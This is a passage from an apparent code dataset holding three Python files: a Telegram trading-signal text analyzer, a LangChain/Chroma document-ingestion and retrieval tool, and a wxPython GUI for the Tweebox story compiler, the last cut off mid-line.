"name"}, {"api_name": "ast.Try", "line_number": 929, "usage_type": "argument"}, {"api_name": "engine.functional.terms.Read", "line_number": 942, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 942, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 942, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 943, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 943, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 943, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 949, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 949, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 961, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 961, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 961, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 962, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 962, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 970, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 970, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 970, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 971, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 971, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 971, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 972, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 972, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 972, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 973, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 973, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 973, "usage_type": "name"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 977, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 977, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 977, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 978, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 978, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 978, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 979, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 979, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 984, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 984, "usage_type": "name"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 984, "usage_type": "call"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 985, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 985, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 986, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 986, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 987, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 987, "usage_type": "name"}, {"api_name": "engine.functional.terms.IsInstance", "line_number": 989, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 989, "usage_type": "name"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 990, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 990, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.IS", "line_number": 990, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 990, "usage_type": "name"}, {"api_name": "engine.functional.terms.CNone", "line_number": 990, "usage_type": "attribute"}, {"api_name": "ast.VariableDeclaration", "line_number": 999, "usage_type": "argument"}, {"api_name": "ast.ProcedureDefinition", "line_number": 1004, "usage_type": "argument"}, {"api_name": "ast.PropertyDefinition", "line_number": 1012, "usage_type": "argument"}, {"api_name": "engine.functional.terms.NewProperty", "line_number": 1022, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1022, "usage_type": "name"}, {"api_name": "ast.ClassDefinition", "line_number": 1025, "usage_type": "argument"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1043, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewNamespace", "line_number": 1043, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1043, "usage_type": "name"}, {"api_name": "engine.functional.terms.NewClass", "line_number": 1047, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1047, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1047, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1047, "usage_type": "call"}, {"api_name": "ast.ImportNames", "line_number": 1054, "usage_type": "name"}, {"api_name": "ast.ImportSource", "line_number": 1054, "usage_type": "name"}, {"api_name": "util.check_type", "line_number": 1056, "usage_type": "call"}, {"api_name": "modules.ModuleSpecification", "line_number": 1056, "usage_type": "argument"}, {"api_name": "ast.ImportSource", "line_number": 1059, "usage_type": "argument"}, {"api_name": "ast.ImportNames", "line_number": 1067, "usage_type": "argument"}, {"api_name": "engine.functional.reference.AbsoluteFrameReference", "line_number": 1105, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1106, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewDict", "line_number": 1106, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.values.VDict.get", "line_number": 1114, "usage_type": "attribute"}, {"api_name": "engine.functional.values.VDict", "line_number": 1114, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1114, "usage_type": "call"}, {"api_name": "engine.functional.terms.Read", "line_number": 1116, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1116, "usage_type": "call"}, {"api_name": "engine.functional.terms.Comparison", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1117, "usage_type": "name"}, {"api_name": "engine.functional.terms.ComparisonOperator.NEQ", "line_number": 1117, "usage_type": "attribute"}, {"api_name": "engine.functional.terms.ComparisonOperator", "line_number": 1117, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.reference.ExceptionReference", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.CNone", "line_number": 1117, "usage_type": "call"}, {"api_name": "engine.functional.terms.CTerm", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.values.VDict.set", "line_number": 1119, "usage_type": "attribute"}, {"api_name": "engine.functional.values.VDict", "line_number": 1119, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 1119, "usage_type": "call"}, {"api_name": "engine.functional.values.VProcedure", "line_number": 1124, "usage_type": "call"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewNamespace", "line_number": 1143, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1143, "usage_type": "name"}, {"api_name": "engine.functional.terms.TRef", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.reference.ReturnValueReference", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.terms.NewModule", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.terms", "line_number": 1158, "usage_type": "name"}, {"api_name": "engine.functional.terms.Read", "line_number": 1158, "usage_type": "call"}, {"api_name": "engine.functional.reference.FrameReference", "line_number": 1158, "usage_type": "call"}]} +{"seq_id": "17330651811", "text": "import json\nimport os\nfrom server.sql import sqlScripts\n\n\nclass Analyzer:\n BUY_ACTION = 1\n SELL_ACTION = 0\n STOP_LOSS_KEY = 'stop_loss'\n TAKE_PROFIT_KEY = 'take_profit'\n stop_loss = None\n take_profit_levels = []\n config = {\n \"buy_signals\": [\n \"buy\",\n \"buy now\"\n ],\n \"sell_signals\": [\n \"sell\",\n \"sell now\"\n ],\n \"telegram_user_name\": \"your_telegram_user_name\",\n \"api_id\": \"your_telegram_api_id\",\n \"api_hash\": \"your_telegram_api_hash\"\n }\n\n def __init__(self, text, dbCursor, chat_id, chat_name, serialized_chat_info):\n self.chat_id = chat_id\n self.chat_name = chat_name\n self.serialized_chat_info = serialized_chat_info\n self.dbCursor = dbCursor\n self.text = text.lower()\n self.symbol = self.identifySymbol()\n self.action = self.identifyAction()\n self.action_now = self.identifyActionNow()\n self.identifyStopLossLevel()\n self.identifyAllTakeProfitLevels()\n self.checkForConfigFiles()\n\n def identifyActionNow(self):\n if 'now' in self.text:\n return True\n\n return False\n\n def checkForConfigFiles(self):\n if not os.path.isfile('./config.json'):\n with open('./config.json', 'w') as config_file:\n json.dump(self.config, config_file)\n else:\n with open('./config.json', 'r') as config_file:\n self.config = json.load(config_file)\n\n def identifyAction(self):\n sell_counter = 0\n buy_counter = 0\n for s in self.config['sell_signals']:\n if s in self.text:\n sell_counter += 1\n\n for b in self.config['buy_signals']:\n if b in self.text:\n buy_counter += 1\n\n if buy_counter >= 1 and sell_counter == 0:\n return self.BUY_ACTION\n\n if sell_counter >= 1 and buy_counter == 0:\n return self.SELL_ACTION\n\n return None\n\n def identifySymbol(self):\n res = self.dbCursor.execute(sqlScripts.constructGetInstrumentsSql())\n allowedSymbols = res.fetchall()\n\n for symbol in allowedSymbols:\n if symbol[1].lower() in self.text:\n return symbol[2]\n\n return None\n\n def isSignalValid(self):\n if self.action is None or self.symbol is None:\n return False\n\n if self.identifyActionNow():\n return True\n\n if self.stop_loss is None or len(self.take_profit_levels) == 0:\n return False\n\n return True\n\n def identifyAllTakeProfitLevels(self):\n if self.serialized_chat_info['allow_multiple_tp']:\n for i in range(0, len(self.serialized_chat_info['take_profit_key_words']) - 1):\n current_key_word = self.serialized_chat_info['take_profit_key_words'][i]\n self.take_profit_levels.append(self.identifySingleTakeProfitLevel(current_key_word))\n self.take_profit_levels = [i for i in self.take_profit_levels if i is not None]\n else:\n self.take_profit_levels.append(\n self.identifySingleTakeProfitLevel(self.serialized_chat_info['take_profit_key_words'][0])\n )\n\n def identifyStopLossLevel(self):\n index_start = self.text.find(self.serialized_chat_info['stop_loss_key_word'].lower())\n index_end = index_start + len(self.serialized_chat_info['stop_loss_key_word'])\n skipped_first_space = False\n for i in range(index_end, len(self.text)):\n current_char = self.text[i]\n if current_char.isnumeric() or current_char == \".\":\n if self.stop_loss is None:\n self.stop_loss = str(current_char)\n continue\n\n self.stop_loss = self.stop_loss + str(current_char)\n\n else:\n if skipped_first_space is False:\n skipped_first_space = True\n continue\n else:\n break\n\n def identifySingleTakeProfitLevel(self, take_profit_key_word):\n if take_profit_key_word.lower() not in self.text:\n return\n\n take_profit_level = None\n\n index_start = self.text.find(take_profit_key_word)\n index_end = index_start + len(take_profit_key_word)\n skipped_first_space = False\n for i in range(index_end, len(self.text)):\n current_char = self.text[i]\n if current_char.isnumeric() or current_char == \".\":\n if take_profit_level is None:\n take_profit_level = str(current_char)\n continue\n\n take_profit_level = take_profit_level + str(current_char)\n\n else:\n if skipped_first_space is False:\n skipped_first_space = True\n continue\n else:\n break\n\n return take_profit_level\n\n def printDetails(self):\n print(\"Signal Info:\")\n print(f\"Instrument: {self.action} {self.symbol}\")\n print(f\"Take-profit-levels: {self.take_profit_levels}\")\n print(f\"Stop-loss: {self.stop_loss}\")\n", "repo_name": "NagaiMatsuge/ucharKetmon", "sub_path": "server/utils/analyzer/analyzer.py", "file_name": "analyzer.py", "file_ext": "py", "file_size_in_byte": 5196, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "os.path.isfile", "line_number": 47, "usage_type": "call"}, {"api_name": "os.path", "line_number": 47, "usage_type": "attribute"}, {"api_name": "json.dump", "line_number": 49, "usage_type": "call"}, {"api_name": "json.load", "line_number": 52, "usage_type": "call"}, {"api_name": "server.sql.sqlScripts.constructGetInstrumentsSql", "line_number": 74, "usage_type": "call"}, {"api_name": "server.sql.sqlScripts", "line_number": 74, "usage_type": "name"}]} +{"seq_id": "8279342456", "text": "from dotenv import load_dotenv\nfrom langchain.chains import RetrievalQA\nfrom langchain.embeddings import HuggingFaceEmbeddings\nfrom langchain.embeddings import HuggingFaceInstructEmbeddings\nfrom langchain import HuggingFacePipeline\n\nfrom langchain.vectorstores import Chroma\nfrom langchain.docstore.document import Document\nfrom langchain.text_splitter import CharacterTextSplitter, TokenTextSplitter, RecursiveCharacterTextSplitter\nfrom server.oobabooga_llm import OobaboogaLLM\nfrom langchain.llms import OpenAI\nfrom langchain.embeddings.openai import OpenAIEmbeddings\nfrom constants import *\nimport os\n\nload_dotenv()\nTEST_FILE = os.getenv(\"TEST_FILE\")\nEMB_INSTRUCTOR_XL = os.getenv(\"EMBEDDINGS_MODEL\")\n\nCHROMA_SETTINGS = {} # Set your Chroma settings here\ndef load_tools(llm_model):\n \n def ingest_file(file_path):\n # Load text file\n with open(file_path, 'r') as file:\n text = file.read()\n\n # Use filename as title\n title = os.path.basename(file_path)\n docs = {title: text}\n embedding = HuggingFaceInstructEmbeddings(model_name=EMB_INSTRUCTOR_XL, model_kwargs={\"device\": \"cuda:2\"})\n \n documents = [Document(page_content=docs[title]) for title in docs]\n # Split by section, then split by token limit\n text_splitter = RecursiveCharacterTextSplitter(chunk_size=100, chunk_overlap=20)\n texts = text_splitter.split_documents(documents)\n \n text_splitter = TokenTextSplitter(chunk_size=512,chunk_overlap=10, encoding_name=\"cl100k_base\") # may be inexact\n texts = text_splitter.split_documents(texts)\n \n vectordb = Chroma.from_documents(documents=texts, embedding=embedding)\n retriever = vectordb.as_retriever(search_kwargs={\"k\":4})\n\n print(title)\n print(retriever)\n \n return retriever, title\n\n file_path = TEST_FILE\n retriever, title = ingest_file(file_path)\n\n def searchChroma(key_word):\n hf_llm = OobaboogaLLM() \n qa = RetrievalQA.from_chain_type(llm=hf_llm, chain_type=\"stuff\",\\\n retriever=retriever, return_source_documents=False)\n \n print(qa)\n res=qa.run(key_word)\n print(res)\n return res\n\n dict_tools = {\n 'Chroma Search': searchChroma,\n 'File Ingestion': ingest_file,\n }\n return dict_tools\n\n\n", "repo_name": "Karajan421/langchain_guidance", "sub_path": "server/tools.py", "file_name": "tools.py", "file_ext": "py", "file_size_in_byte": 2381, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 16, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 17, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.basename", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "langchain.embeddings.HuggingFaceInstructEmbeddings", "line_number": 31, "usage_type": "call"}, {"api_name": "langchain.docstore.document.Document", "line_number": 33, "usage_type": "call"}, {"api_name": "langchain.text_splitter.RecursiveCharacterTextSplitter", "line_number": 35, "usage_type": "call"}, {"api_name": "langchain.text_splitter.TokenTextSplitter", "line_number": 38, "usage_type": "call"}, {"api_name": "langchain.vectorstores.Chroma.from_documents", "line_number": 41, "usage_type": "call"}, {"api_name": "langchain.vectorstores.Chroma", "line_number": 41, "usage_type": "name"}, {"api_name": "server.oobabooga_llm.OobaboogaLLM", "line_number": 53, "usage_type": "call"}, {"api_name": "langchain.chains.RetrievalQA.from_chain_type", "line_number": 54, "usage_type": "call"}, {"api_name": "langchain.chains.RetrievalQA", "line_number": 54, "usage_type": "name"}]} +{"seq_id": "17283598333", "text": "#\n# gui.py\n#\n# This handles the project window and menus.\n#\n\nimport os, sys, wx, urllib\nfrom project import Project\nimport tiddlywiki\n\nID_HELP = 101\nID_GOOGLE_GROUP = 102\n\nID_NEW_PROJECT = 103\nID_OPEN_PROJECT = 104\nID_SAVE_PROJECT = 105\nID_SAVE_PROJECT_AS = 106\n\nID_ADD_SOURCE = 107\nID_REMOVE_SOURCE = 108\nID_BUILD = 109\nID_PROOF = 110\n\nID_TARGET_CHOICE = 201\nID_SAVEAS_BUTTON = 202\nID_BUILD_BUTTON = 203\nID_ADD_BUTTON = 204\n\n\nclass ProjectWindow (wx.Frame):\n\n\t#\n\t# constructors\n\t#\n\n\tdef __init__ (self, parent):\n\t\n\t\t# restore our config and recently-opened files\n\t\t\n\t\tself.config = wx.Config('Tweebox')\n\t\tself.recentFiles = wx.FileHistory(5)\n\t\tself.recentFiles.Load(self.config)\n\t\n\t\t# get a new Project object\n\t\t\n\t\tself.project = Project()\n\t\tself.fileName = ''\n\t\tself.dirty = False\n\n\t\t# create the window\n\n\t\twx.Frame.__init__(self, parent, wx.ID_ANY, 'Untitled Project', \\\n\t\t\t\t\t\t size = (550, 250), style = wx.CLOSE_BOX | wx.CAPTION | wx.SYSTEM_MENU | wx.MINIMIZE_BOX)\n\t\tself.addMenus()\t\t\n\t\tself.addControls()\n\t\tself.CreateStatusBar()\n\t\t\t\t\n\t\t# show our window\n\t\n\t\tself.Centre()\n\t\tself.Show(True)\n\t\t\n\t\t# try opening the most recent project\n\t\t\n\t\tif self.recentFiles.GetCount() > 0:\n\t\t\tself.fileName = self.recentFiles.GetHistoryFile(0)\n\t\t\tself.loadFile(failLoudly = False)\n\t\t\t\n\t\t\n\tdef addMenus (self):\n\t\n\t\t# create menus\n\n\t\thelpMenu = wx.Menu()\n\t\thelpMenu.Append(wx.ID_ABOUT, '&About Tweebox')\n\t\thelpMenu.Append(ID_HELP, 'Tweebox &Help')\n\t\thelpMenu.Append(ID_GOOGLE_GROUP, 'Discuss Twee Online')\n\t\t\n\t\tfileMenu = wx.Menu()\n\t\tself.fileNewItem = fileMenu.Append(ID_NEW_PROJECT, '&New Project\\tCtrl-N')\n\t\tself.fileOpenItem = fileMenu.Append(ID_OPEN_PROJECT, '&Open Project...\\tCtrl-O')\n\t\tfileMenu.AppendSeparator()\n\t\tself.fileSaveItem = fileMenu.Append(ID_SAVE_PROJECT, '&Save Project\\tCtrl-S')\n\t\tself.fileSaveAsItem = fileMenu.Append(ID_SAVE_PROJECT_AS, 'S&ave Project As...')\n\t\tfileMenu.AppendSeparator()\n\t\tself.fileQuitItem = fileMenu.Append(wx.ID_EXIT, '&Exit\\tCtrl-Q')\n\t\tself.recentFiles.UseMenu(fileMenu)\n\t\tself.recentFiles.AddFilesToMenu()\n\n\t\tprojectMenu = wx.Menu()\n\t\tself.projectAddItem = projectMenu.Append(ID_ADD_SOURCE, 'Add Source File...')\n\t\tself.projectRemoveItem = projectMenu.Append(ID_REMOVE_SOURCE, 'Remove Source File')\n\t\tprojectMenu.AppendSeparator()\n\t\tself.projectBuildItem = projectMenu.Append(ID_BUILD, '&Build Story\\tCtrl-B')\n\t\tself.projectProofItem = projectMenu.Append(ID_PROOF, '&Proof Story\\tCtrl-P')\n\t\t\n\t\t# create menu bar\n\t\t\n\t\tmenuBar = wx.MenuBar()\n\t\tmenuBar.Append(fileMenu, '&File')\n\t\tmenuBar.Append(projectMenu, '&Project')\n\t\tmenuBar.Append(helpMenu, '&Help')\n\t\tself.SetMenuBar(menuBar)\t\t\n\n\t\t# add menu events\n\t\t\n\t\twx.EVT_UPDATE_UI(self, -1, self.updateUI)\n\t\t\n\t\twx.EVT_MENU(self, wx.ID_ABOUT, self.onAbout)\n\t\twx.EVT_MENU(self, ID_HELP, self.onHelp)\n\t\twx.EVT_MENU(self, ID_GOOGLE_GROUP, self.onGoogleGroup)\n\t\twx.EVT_MENU(self, ID_NEW_PROJECT, self.onNew)\n\t\twx.EVT_MENU(self, ID_OPEN_PROJECT, self.onOpen)\n\t\twx.EVT_MENU(self, ID_SAVE_PROJECT, self.onSave)\n\t\twx.EVT_MENU(self, ID_SAVE_PROJECT_AS, self.onSaveAs)\n\t\twx.EVT_MENU(self, wx.ID_EXIT, self.onQuit)\n\t\twx.EVT_MENU(self, wx.ID_FILE1, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE2, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE3, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE4, self.onOpenRecent)\n\t\twx.EVT_MENU(self, wx.ID_FILE5, self.onOpenRecent)\n\t\twx.EVT_MENU(self, ID_ADD_SOURCE, self.onAddSource)\n\t\twx.EVT_MENU(self, ID_REMOVE_SOURCE, self.onRemoveSource)\n\t\twx.EVT_MENU(self, ID_BUILD, self.onBuild)\n\t\twx.EVT_MENU(self, ID_PROOF, self.onProof)\n\n\n\tdef addControls (self):\n\t\tpanel = wx.Panel(self)\n\t\tmainSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\tpanel.SetSizer(mainSizer)\n\t\t\n\t\t# sources on the left half\n\t\t\n\t\tsourcesPanel = wx.Panel(panel)\n\t\tsourcesBox = wx.StaticBox(sourcesPanel, wx.ID_ANY, 'Source Files')\n\t\tsourcesSizer = wx.StaticBoxSizer(sourcesBox, wx.VERTICAL)\n\t\tsourcesPanel.SetSizer(sourcesSizer)\n\t\t\n\t\tself.sourcesList = wx.ListBox(sourcesPanel)\n\t\tself.addButton = wx.Button(sourcesPanel, ID_ADD_BUTTON, 'Add')\n\t\twx.EVT_BUTTON(self, ID_ADD_BUTTON, self.onAddSource)\n\t\t\n\t\tsourcesSizer.Add(self.sourcesList, 1, wx.EXPAND)\n\t\tsourcesSizer.Add(self.addButton, 0, wx.TOP | wx.ALIGN_RIGHT, 8)\n\t\t\n\t\t# story file stuff on the right half\n\t\t\n\t\tstoryPanel = wx.Panel(panel)\n\t\tstoryBox = wx.StaticBox(storyPanel, wx.ID_ANY, 'Story File')\n\t\tstorySizer = wx.StaticBoxSizer(storyBox, wx.VERTICAL)\n\t\tstoryPanel.SetSizer(storySizer)\n\t\t\n\t\t# file destination row\n\t\t\n\t\tsaveAsPanel = wx.Panel(storyPanel)\n\t\tsaveAsSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\tsaveAsPanel.SetSizer(saveAsSizer)\n\t\t\n\t\tself.saveAsText = wx.StaticText(saveAsPanel, wx.ID_ANY, 'Save As:')\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\tself.saveAsButton = wx.Button(saveAsPanel, ID_SAVEAS_BUTTON, 'Set')\t\t\t\t\t\t\t\t \n\t\twx.EVT_BUTTON(self, ID_SAVEAS_BUTTON, self.onSetDestination)\n\t\t\n\t\tsaveAsSizer.Add(self.saveAsText, 1, wx.TOP | wx.BOTTOM | wx.EXPAND, 10)\n\t\tsaveAsSizer.Add(self.saveAsButton, 0, wx.TOP | wx.BOTTOM, 8)\n\n\t\tstorySizer.Add(saveAsPanel, 0, wx.EXPAND, 0)\n\t\t\n\t\t# target row\n\n\t\ttargetPanel = wx.Panel(storyPanel)\n\t\ttargetSizer = wx.BoxSizer(wx.HORIZONTAL)\n\t\ttargetPanel.SetSizer(targetSizer)\n\t\t\n\t\tself.targetLabel = wx.StaticText(targetPanel, wx.ID_ANY, 'Story Format:')\n\n\t\tself.targetChoice = wx.Choice(targetPanel, ID_TARGET_CHOICE, \\\n\t\t\t\t\t\t\t\t\t choices = ('Sugarcane', 'Jonah', 'TiddlyWiki 2', 'TiddlyWiki 1.2'))\n\t\tself.targetChoice.SetSelection(0)\n\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\t\n\t\twx.EVT_CHOICE(self, ID_TARGET_CHOICE, self.onChangeTarget)\n\t\t\n\t\ttargetSizer.Add(self.targetLabel, 1, wx.TOP | wx.BOTTOM, 10)\n\t\ttargetSizer.Add(self.targetChoice, 1, wx.TOP | wx.BOTTOM, 8)\n\t\t\n\t\tstorySizer.Add(targetPanel, 0, wx.ALL | wx.EXPAND, 0)\n\t\t\n\t\t# add our halves to the main panel\n\t\t\n\t\tmainSizer.Add(sourcesPanel, 1, wx.ALL | wx.EXPAND, 8)\n\t\tmainSizer.Add(storyPanel, 1, wx.ALL | wx.EXPAND, 8)\n\t\t\t\t\n\t#\n\t# utility functions\n\t#\n\n\tdef updateUI (self, event):\t\t\n\t\tif self.sourcesList.GetSelection() == wx.NOT_FOUND:\n\t\t\tself.projectRemoveItem.Enable(False)\n\t\telse:\n\t\t\tself.projectRemoveItem.Enable(True)\n\t\t\t\n\t\tif self.sourcesList.IsEmpty():\n\t\t\tself.projectBuildItem.Enable(False)\n\t\t\tself.projectProofItem.Enable(False)\n\t\telse:\n\t\t\tself.projectBuildItem.Enable(True)\n\t\t\tself.projectProofItem.Enable(True)\n\t\t\t\n\t\t\t\n\tdef updateTitle (self):\n\t\tif self.fileName == '':\n\t\t\ttitle = 'Untitled Project'\n\t\telse:\n\t\t\tbits = os.path.splitext(self.fileName)\n\t\t\ttitle = os.path.basename(bits[0])\n\t\t\t\n\t\tself.SetTitle('Tweebox - ' + title)\n\t\t\n\t\n\tdef updateDestination (self):\n\t\tlabel = 'Save As: '\n\t\t\n\t\tif self.project.destination != '':\n\t\t\tlabel += os.path.basename(self.project.destination)\n\t\t\n\t\tself.saveAsText.SetLabel(label)\n\t\t\n\t\t\n\tdef closeProject (self):\n\t\tif self.dirty:\n\t\t\tbits = os.path.splitext(self.fileName)\n\t\t\ttitle = os.path.basename(bits[0])\n\n\t\t\tmessage = 'Close ' + title + ' without saving changes?'\n\t\t\tdialog = wx.MessageDialog(self, message, 'Save Changes', \\\n\t\t\t\t\t\t\t\t\t wx.ICON_QUESTION | wx.YES_NO | wx.NO_DEFAULT)\n\t\t\treturn (dialog.ShowModal() == wx.ID_YES)\n\t\telse:\n\t\t\treturn True\n\t\t\t\n\n\tdef targetToReadable (self, target):\n\t\tif target == 'sugarcane':\n\t\t\treturn 'Sugarcane'\n\t\t\n\t\tif target == 'jonah':\n\t\t\treturn 'Jonah'\n\t\t\t\n\t\tif target == 'tw2':\n\t\t\treturn 'TiddlyWiki 2'\n\t\t\t\n\t\tif target == 'tw':\n\t\t\treturn 'TiddlyWiki 1.2'\n\t\t\n\t\n\tdef readableToTarget (self, readable):\n\t\tif readable == 'Sugarcane':\n\t\t\treturn 'sugarcane'\n\t\t\n\t\tif readable == 'Jonah':\n\t\t\treturn 'jonah'\n\t\t\t\n\t\tif readable == 'TiddlyWiki 2':\n\t\t\treturn 'tw2'\n\t\t\t\n\t\tif readable == 'TiddlyWiki 1.2':\n\t\t\treturn 'tw'\n\t\t\t\n\t#\n\t# event handlers\n\t#\n\n\tdef onAbout (self, event):\n\t\tinfo = wx.AboutDialogInfo()\n\t\tinfo.SetName('Tweebox')\n\t\tinfo.SetVersion('2.1')\n\t\tinfo.SetDescription('\\nA tool for creating interactive stories\\nwritten by Chris Klimas\\n\\nhttp://gimcrackd.com/etc/src/')\n\t\tinfo.SetCopyright('The Twee compiler and associated JavaScript files in this application are released under the GNU Public License.\\n\\nThe files in the targets directory are derivative works of Jeremy Ruston\\'s TiddlyWiki project and are used under the terms of its license.')\n\t\twx.AboutBox(info)\n\n\t\t\n\tdef onHelp (self, event):\n\t\twx.LaunchDefaultBrowser('http://gimcrackd.com/etc/doc/')\n\n\t\t\n\tdef onGoogleGroup (self, event):\n\t\twx.LaunchDefaultBrowser('http://groups.google.com/group/tweecode')\n\n\n\tdef onNew (self, event):\n\t\tif (self.closeProject()):\n\t\t\tself.project = Project()\n\t\t\tself.fileName = ''\n\t\t\tself.dirty = True\n\t\t\tself.updateTitle()\n\t\t\tself.updateDestination()\n\t\t\tself.sourcesList.Clear()\n\t\t\t\n\t\t\t\n\tdef onOpen (self, event):\n\t\tif (self.closeProject()):\n\t\t\tdialog = wx.FileDialog(self, 'Open Project', os.getcwd(), \"\", \\\n\t\t\t\t\t\t\t\t \"Tweebox Project (*.twp)|*.twp\", \\\n\t\t\t\t\t\t\t\t wx.OPEN | wx.FD_CHANGE_DIR)\n\t\t\t\t\t\t\t\t\t\t\t\t\t \t \n\t\t\tif dialog.ShowModal() == wx.ID_OK:\n\t\t\t\tself.fileName = dialog.GetPath()\n\t\t\t\tself.loadFile()\n\t\t\t\tself.recentFiles.AddFileToHistory(self.fileName)\n\t\t\t\t\n\t\t\tdialog.Destroy()\n\t\t\t\t\n\tdef onOpenRecent (self, event):\t\t\n\t\tif event.GetId() == wx.ID_FILE1:\n\t\t index = 0\n\t\telif event.GetId() == wx.ID_FILE2:\n\t\t index = 1\n\t\telif event.GetId() == wx.ID_FILE3:\n\t\t index = 2\n\t\telif event.getId() == wx.ID_FILE4:\n\t\t index = 3\n\t\telif event.getId() == wx.ID_FILE5:\n\t\t index = 4\n\t\t\t \n\t\tself.fileName = self.recentFiles.GetHistoryFile(index)\n\t\tself.loadFile()\n\n\tdef loadFile (self, failLoudly = True):\n\t\ttry:\n\t\t\tself.project = Project(self.fileName)\n\t\texcept:\n\t\t\tif failLoudly:\n\t\t\t\twx.MessageBox('Can\\'t open ' + self.fileName + '. Make sure this file has not been moved ' + \\\n\t\t\t\t \t\t 'or deleted, and that you are able to read files in this location.', \\\n\t\t\t\t\t\t\t 'Can\\'t Open File', 